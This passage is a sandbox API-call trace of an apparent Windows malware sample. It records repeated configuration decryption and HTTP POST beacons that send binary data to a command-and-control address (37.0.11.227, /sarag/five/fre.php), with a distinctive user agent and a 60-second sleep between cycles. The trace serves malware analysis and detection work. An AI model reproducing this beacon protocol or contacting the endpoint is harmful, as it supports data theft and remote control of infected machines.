(lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.745] GetProcessHeap () returned 0x690000 [0223.745] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0223.745] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.745] GetProcessHeap () returned 0x690000 [0223.746] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0223.749] GetProcessHeap () returned 0x690000 [0223.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.750] GetProcessHeap () returned 0x690000 [0223.750] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.750] GetProcessHeap () returned 0x690000 [0223.750] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0223.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.751] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.759] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.760] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0223.769] GetProcessHeap () returned 0x690000 [0223.769] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a00 [0223.770] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.770] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a8a00, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d628) returned 1 [0223.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.771] CryptSetKeyParam (hKey=0x69d628, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.772] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.772] CryptSetKeyParam (hKey=0x69d628, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.772] GetProcessHeap () returned 0x690000 [0223.772] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a00 | out: hHeap=0x690000) returned 1 [0223.773] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.773] CryptDecrypt (in: hKey=0x69d628, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0223.774] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.775] CryptDestroyKey (hKey=0x69d628) returned 1 [0223.777] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.777] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0223.777] GetProcessHeap () returned 0x690000 [0223.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0223.778] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.778] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0223.779] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.779] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0223.780] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.780] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0223.781] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.781] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0223.781] GetProcessHeap () returned 0x690000 [0223.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0223.781] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0223.781] GetProcessHeap () returned 0x690000 [0223.781] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0223.781] socket (af=2, type=1, protocol=6) returned 0x594 [0223.782] connect (s=0x594, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0223.807] FreeAddrInfoW (pAddrInfo=0x6a3088*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0223.807] GetProcessHeap () returned 0x690000 [0223.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0223.807] GetProcessHeap () returned 0x690000 [0223.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0223.807] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.810] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0223.810] GetProcessHeap () returned 0x690000 [0223.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af680 [0223.810] GetProcessHeap () returned 0x690000 [0223.810] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.811] GetProcessHeap () returned 0x690000 [0223.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0223.811] GetProcessHeap () returned 0x690000 [0223.811] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0223.811] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0223.812] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0223.812] GetProcessHeap () returned 0x690000 [0223.812] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0223.812] GetProcessHeap () returned 0x690000 [0223.813] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0223.813] send (s=0x594, buf=0x6ad508*, len=242, flags=0) returned 242 [0223.813] send (s=0x594, buf=0x6aba40*, len=159, flags=0) returned 159 [0223.813] GetProcessHeap () returned 0x690000 [0223.813] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0223.814] recv (in: s=0x594, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0223.895] GetProcessHeap () returned 0x690000 [0223.896] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0223.898] GetProcessHeap () returned 0x690000 [0223.898] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0223.898] GetProcessHeap () returned 0x690000 [0223.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af680 | out: hHeap=0x690000) returned 1 [0223.899] GetProcessHeap () returned 0x690000 [0223.899] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0223.899] closesocket (s=0x594) returned 0 [0223.899] GetProcessHeap () returned 0x690000 [0223.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0223.900] GetProcessHeap () returned 0x690000 [0223.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0223.900] GetProcessHeap () returned 0x690000 [0223.900] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0223.900] GetProcessHeap () returned 0x690000 [0223.901] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0223.901] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x2f0) returned 0x594 [0223.903] Sleep (dwMilliseconds=0xea60) [0223.904] GetProcessHeap () returned 0x690000 [0223.904] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0223.905] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.905] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.911] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0223.920] GetProcessHeap () returned 0x690000 [0223.920] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0223.921] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.922] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.923] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.923] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.924] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.924] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.925] GetProcessHeap () returned 0x690000 [0223.925] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0223.926] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.926] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0223.927] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.927] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0223.931] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.931] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0223.931] GetProcessHeap () returned 0x690000 [0223.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6abd08 [0223.933] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.933] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0223.934] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.935] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0223.939] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.939] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0223.942] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0223.942] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0223.942] GetProcessHeap () returned 0x690000 [0223.942] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0223.942] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0223.943] GetProcessHeap () returned 0x690000 [0223.943] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0223.943] GetProcessHeap () returned 0x690000 [0223.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6abd08 | out: hHeap=0x690000) returned 1 [0223.944] GetProcessHeap () returned 0x690000 [0223.944] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0223.944] GetProcessHeap () returned 0x690000 [0223.944] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0223.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.946] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0223.951] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.951] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0223.958] GetProcessHeap () returned 0x690000 [0223.958] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0223.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.959] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0223.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.960] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0223.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.961] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0223.961] GetProcessHeap () returned 0x690000 [0223.962] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0223.977] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0223.978] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0224.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.017] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0224.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.018] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0224.018] GetProcessHeap () returned 0x690000 [0224.018] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.019] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.019] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0224.020] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.021] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0224.021] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.022] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0224.023] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.023] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0224.023] GetProcessHeap () returned 0x690000 [0224.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0224.023] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0224.023] GetProcessHeap () returned 0x690000 [0224.023] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4c0 [0224.023] socket (af=2, type=1, protocol=6) returned 0x598 [0224.024] connect (s=0x598, name=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0224.056] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aeb50*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0224.056] GetProcessHeap () returned 0x690000 [0224.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0224.056] GetProcessHeap () returned 0x690000 [0224.056] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b67a8 [0224.057] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.058] wvsprintfA (in: param_1=0x6b67a8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0224.058] GetProcessHeap () returned 0x690000 [0224.058] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0224.058] GetProcessHeap () returned 0x690000 [0224.059] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.061] GetProcessHeap () returned 0x690000 [0224.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4148 [0224.061] GetProcessHeap () returned 0x690000 [0224.061] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b67a8 [0224.062] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0224.063] wvsprintfA (in: param_1=0x6b67a8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0224.063] GetProcessHeap () returned 0x690000 [0224.063] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0224.063] GetProcessHeap () returned 0x690000 [0224.063] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b67a8 | out: hHeap=0x690000) returned 1 [0224.065] send (s=0x598, buf=0x6ad508*, len=242, flags=0) returned 242 [0224.065] send (s=0x598, buf=0x6aba40*, len=159, flags=0) returned 159 [0224.065] GetProcessHeap () returned 0x690000 [0224.065] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0224.065] recv (in: s=0x598, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0224.154] GetProcessHeap () returned 0x690000 [0224.154] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0224.154] GetProcessHeap () returned 0x690000 [0224.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4148 | out: hHeap=0x690000) returned 1 [0224.155] GetProcessHeap () returned 0x690000 [0224.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0224.155] GetProcessHeap () returned 0x690000 [0224.155] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0224.155] closesocket (s=0x598) returned 0 [0224.157] GetProcessHeap () returned 0x690000 [0224.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4c0 | out: hHeap=0x690000) returned 1 [0224.157] GetProcessHeap () returned 0x690000 [0224.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.157] GetProcessHeap () returned 0x690000 [0224.157] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0224.157] GetProcessHeap () returned 0x690000 [0224.158] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0224.160] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x310) returned 0x598 [0224.162] Sleep (dwMilliseconds=0xea60) [0224.163] GetProcessHeap () returned 0x690000 [0224.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0224.195] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0224.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.204] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0224.211] GetProcessHeap () returned 0x690000 [0224.211] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0224.213] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.214] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0224.215] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.215] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0224.216] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.216] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0224.216] GetProcessHeap () returned 0x690000 [0224.217] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0224.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.221] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0224.221] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.222] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0224.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0224.223] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0224.223] GetProcessHeap () returned 0x690000 [0224.224] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0224.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.225] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0224.226] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.226] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0224.227] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.227] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0224.228] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0224.228] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0224.228] GetProcessHeap () returned 0x690000 [0224.228] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0224.238] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0224.240] GetProcessHeap () returned 0x690000 [0224.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0224.241] GetProcessHeap () returned 0x690000 [0224.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0224.241] GetProcessHeap () returned 0x690000 [0224.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0224.241] GetProcessHeap () returned 0x690000 [0224.241] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, 